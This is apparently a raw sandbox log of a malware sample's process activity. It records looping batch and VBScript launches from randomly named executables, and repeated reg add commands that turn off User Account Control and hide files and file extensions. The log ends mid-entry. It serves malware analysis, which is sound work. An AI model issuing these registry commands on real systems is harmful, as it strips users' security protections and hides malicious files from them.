reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\IGMkwoUM\ecEsQUkU.exe

"C:\Users\Admin\IGMkwoUM\ecEsQUkU.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\ProgramData\QAMQQckI\QMYUIoMs.exe

"C:\ProgramData\QAMQQckI\QMYUIoMs.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VwUgIAEY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xWYgMAME.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3520 -ip 3520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4836 -ip 4836

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HiwwEwMo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uiwUowMU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3520 -s 224

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 228

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UkkkgQMs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YWAYQYQM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AEMEAUsc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kiQkkkcM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pGYgkQYQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZoQQIkks.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tyQogsII.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SUwIEcww.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oawwwIoQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eCMYcogU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gksEAEsI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\csEcsUAM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aOsUAUgg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RAMcEssg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rcwsQYUE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xwEUkwQU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JYUYYEwo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TusUQoUQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zcQkYows.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

